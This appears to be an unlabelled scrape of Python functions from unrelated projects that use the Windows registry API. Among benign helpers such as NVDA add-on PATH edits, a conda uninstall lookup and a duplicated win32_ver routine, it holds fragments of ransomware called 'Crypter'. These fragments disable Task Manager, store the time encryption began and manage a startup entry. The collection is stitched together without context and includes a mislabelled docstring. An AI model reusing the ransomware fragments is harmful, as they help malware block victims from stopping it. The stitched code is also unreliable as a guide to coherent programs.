def enable(self): ''' @summary: Disables Windows Task Manager ''' key_exists = False # Try to read the key try: reg = _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER, self.DISABLE_KEY_LOCATION) disabled = _winreg.QueryValueEx(reg, "DisableTaskMgr")[0] _winreg.CloseKey(reg) key_exists = True except: pass # If key exists and is disabled, enable it if key_exists and disabled: reg = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, self.DISABLE_KEY_LOCATION, 0, _winreg.KEY_SET_VALUE) _winreg.SetValueEx(reg, "DisableTaskMgr", 0, _winreg.REG_DWORD, 0x00000000) _winreg.CloseKey(reg)
def get_start_time(self): ''' @summary: Get's Crypter's start time from the registry, or creates it if it doesn't exist @return: The time that the ransomware began it's encryption operation, in integer epoch form ''' # Try to open registry key try: reg = _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER, self.REGISTRY_LOCATION) start_time = _winreg.QueryValueEx(reg, "")[0] _winreg.CloseKey(reg) # If failure, create the key except WindowsError: start_time = int(time.time()) reg = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, self.REGISTRY_LOCATION) _winreg.SetValue(reg, "", _winreg.REG_SZ, str(start_time)) _winreg.CloseKey(reg) return start_time
def has_sound(sound): """Find out if a particular event is configured with a default sound""" try: # Ask the mixer API for the number of devices it knows about. # When there are no devices, PlaySound will fail. if ctypes.windll.winmm.mixerGetNumDevs() is 0: return False key = _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER, "AppEvents\Schemes\Apps\.Default\{0}\.Default".format(sound)) value = _winreg.EnumValue(key, 0)[1] if value is not u"": return True else: return False except WindowsError: return False
def onUninstall(): path = os.path.join(config.getUserDefaultConfigPath(), ".dbInstall") if os.path.exists(path): #This is an update. Bail. os.remove(path) return key = _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER, "Environment", 0, _winreg.KEY_READ | _winreg.KEY_WRITE) try: value, typ = _winreg.QueryValueEx(key, "Path") except: return if value is None or value == "": return dir = os.path.dirname(__file__) if not isinstance(dir, unicode): dir = dir.decode(sys.getfilesystemencoding()) dir = dir.replace(addonHandler.DELETEDIR_SUFFIX, "") if value.find(dir) != -1: value = value.replace(";" + dir, "") value = value.replace(dir + ";", "") value = value.replace(dir, "") _winreg.SetValueEx(key, "Path", None, typ, value) sendMessageTimeout(HWND_BROADCAST, WM_SETTINGCHANGE, 0, u"Environment")
def phkey(self): if self._phkey is not None: return self._phkey try: self._phkey = _winreg.OpenKeyEx(self.surkey.phkey, self.name, 0, self.sam) except WindowsError as e: raise WindowsError(e.winerror, "Could not open registry key <{0}> ({1})".format(self.fullname, e.strerror)) return self._phkey
def isWinNT(self): """Are we running in Windows NT?""" if self.getType() == 'win32': import _winreg try: k=_winreg.OpenKeyEx(_winreg.HKEY_LOCAL_MACHINE, r'Software\Microsoft\Windows NT\CurrentVersion') _winreg.QueryValueEx(k, 'SystemRoot') return 1 except WindowsError: return 0 # not windows NT return 0
def open(cls, *args, **kargs): return _RegKeyDict(_winreg.OpenKeyEx(*args, **kargs))
def subkey(self, name): return _RegKeyDict(_winreg.OpenKeyEx(self.key, name))
def get_previous_install_prefixes(pyversion, arch, allusers=True): """Returns a list of prefixes for all old installations of this arch so that they can be removed from PATH if present. Note, it would be preferable to uninstall them properly instead. """ if allusers: # All Users key, subkey = (reg.HKEY_LOCAL_MACHINE, r'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\') else: # Just Me key, subkey = (reg.HKEY_CURRENT_USER, r'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\') keylist = [] # We ignore pyversion and instead look for any *conda installations. regex = re.compile('Python \S+ \(\S+conda[0-9]+ \S+ '+arch+'\)') _reg_query_sub_keys(key, subkey, keylist) results = [] for uninstsubkey in keylist: final_part = os.path.basename(uninstsubkey.rstrip('\\')) if regex.match(final_part): try: with reg.OpenKeyEx(key, uninstsubkey, 0, reg.KEY_QUERY_VALUE) as keyhandle: reg_value = reg.QueryValueEx(keyhandle, 'UninstallString') results.append(os.path.dirname(re.sub(r'^"|"$', '', reg_value[0]))) except: pass return results
def disable(self): ''' @summary: Disables Windows Task Manager ''' key_exists = False # Try to read the key try: reg = _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER, self.DISABLE_KEY_LOCATION) disabled = _winreg.QueryValueEx(reg, "DisableTaskMgr")[0] _winreg.CloseKey(reg) key_exists = True except: pass # If key doesn't exist, create it and set to disabled if not key_exists: reg = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, self.DISABLE_KEY_LOCATION) _winreg.SetValueEx(reg, "DisableTaskMgr", 0, _winreg.REG_DWORD, 0x00000001) _winreg.CloseKey(reg) # If enabled, disable it elif key_exists and not disabled: reg = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, self.DISABLE_KEY_LOCATION, 0, _winreg.KEY_SET_VALUE) _winreg.SetValueEx(reg, "DisableTaskMgr", 0, _winreg.REG_DWORD, 0x00000001) _winreg.CloseKey(reg)
def __remove_from_startup_programs(self): ''' @summary: Removes Crypter from the list of startup programs @todo: Code and test ''' try: reg = _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER, self.STARTUP_REGISTRY_LOCATION, 0, _winreg.KEY_SET_VALUE) _winreg.DeleteValue(reg, "Crypter") _winreg.CloseKey(reg) except WindowsError: pass
def delete_registry_entries(self): ''' @summary: Deletes the timer registry key ''' # Open and delete the key try: reg = _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER, self.REGISTRY_LOCATION) _winreg.DeleteKeyEx(reg, "") _winreg.CloseKey(reg) except WindowsError: # Ignore any Windows errors pass
def open(self, keyhandle, keypath, flags = None): if type(keypath) is str: keypath = keypath.split('\\') if flags is None: for subkey in keypath: keyhandle = _winreg.CreateKey(keyhandle, subkey) else: for subkey in keypath: keyhandle = _winreg.OpenKeyEx(keyhandle, subkey, 0, flags) self.keyhandle = keyhandle
def cookie_dir(self): import _winreg as winreg key = winreg.OpenKeyEx(winreg.HKEY_CURRENT_USER, 'Software' '\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders') cookie_dir, type = winreg.QueryValueEx(key, 'Cookies') return cookie_dir
def onInstall(postPathBug = False): #Add ourself to the path, so that commands when spoken can be queried to us. #Only if we are truely installing though. addons = [] if not postPathBug: addons = addonHandler.getAvailableAddons() for addon in addons: if addon.name=="DictationBridge": #Hack to work around condition where #the uninstaller removes this addon from the path #After the installer for the updator ran. #We could use version specific directories, but wsr macros Does not #play nice with refreshing the path environment after path updates, # requiring a complete reboot of wsr, or commands spontaneously break cripticly. with open(os.path.join(config.getUserDefaultConfigPath(), ".dbInstall"), "w") as fi: fi.write("dbInstall") return key = _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER, "Environment", 0, _winreg.KEY_READ | _winreg.KEY_WRITE) try: value, typ = _winreg.QueryValueEx(key, "Path") except: value, typ = None, _winreg.REG_EXPAND_SZ if value is None: value = "" dir = os.path.dirname(__file__) if not isinstance(dir, unicode): dir = dir.decode(sys.getfilesystemencoding()) dir = dir.replace(addonHandler.ADDON_PENDINGINSTALL_SUFFIX, "") log.info("addon directory: %r" % dir) log.info("current PATH: %r" % value) if value.lower().find(dir.lower()) == -1: if value != "": value += ";" value += dir log.info("new PATH: %r" % value) _winreg.SetValueEx(key, "Path", None, typ, value) sendMessageTimeout(HWND_BROADCAST, WM_SETTINGCHANGE, 0, u"Environment")
def win32_ver(release='', version='', csd='', ptype=''): try: from sys import getwindowsversion except ImportError: return release, version, csd, ptype try: from winreg import OpenKeyEx, QueryValueEx, CloseKey, HKEY_LOCAL_MACHINE except ImportError: from _winreg import OpenKeyEx, QueryValueEx, CloseKey, HKEY_LOCAL_MACHINE winver = getwindowsversion() maj, min, build = _get_real_winver(*winver[:3]) version = '{0}.{1}.{2}'.format(maj, min, build) release = (_WIN32_CLIENT_RELEASES.get((maj, min)) or _WIN32_CLIENT_RELEASES.get((maj, None)) or release) # getwindowsversion() reflect the compatibility mode Python is # running under, and so the service pack value is only going to be # valid if the versions match. if winver[:2] == (maj, min): try: csd = 'SP{}'.format(winver.service_pack_major) except AttributeError: if csd[:13] == 'Service Pack ': csd = 'SP' + csd[13:] # VER_NT_SERVER = 3 if getattr(winver, 'product_type', None) == 3: release = (_WIN32_SERVER_RELEASES.get((maj, min)) or _WIN32_SERVER_RELEASES.get((maj, None)) or release) key = None try: key = OpenKeyEx(HKEY_LOCAL_MACHINE, r'SOFTWARE\Microsoft\Windows NT\CurrentVersion') ptype = QueryValueEx(key, 'CurrentType')[0] except: pass finally: if key: CloseKey(key) return release, version, csd, ptype
def win32_ver(release='', version='', csd='', ptype=''): try: from sys import getwindowsversion except ImportError: return release, version, csd, ptype try: from winreg import OpenKeyEx, QueryValueEx, CloseKey, HKEY_LOCAL_MACHINE except ImportError: from _winreg import OpenKeyEx, QueryValueEx, CloseKey, HKEY_LOCAL_MACHINE winver = getwindowsversion() maj, min, build = _get_real_winver(*winver[:3]) version = '{0}.{1}.{2}'.format(maj, min, build) release = (_WIN32_CLIENT_RELEASES.get((maj, min)) or _WIN32_CLIENT_RELEASES.get((maj, None)) or release) # getwindowsversion() reflect the compatibility mode Python is # running under, and so the service pack value is only going to be # valid if the versions match. if winver[:2] == (maj, min): try: csd = 'SP{}'.format(winver.service_pack_major) except AttributeError: if csd[:13] == 'Service Pack ': csd = 'SP' + csd[13:] # VER_NT_SERVER = 3 if getattr(winver, 'product', None) == 3: release = (_WIN32_SERVER_RELEASES.get((maj, min)) or _WIN32_SERVER_RELEASES.get((maj, None)) or release) key = None try: key = OpenKeyEx(HKEY_LOCAL_MACHINE, r'SOFTWARE\Microsoft\Windows NT\CurrentVersion') ptype = QueryValueEx(key, 'CurrentType')[0] except: pass finally: if key: CloseKey(key) return release, version, csd, ptype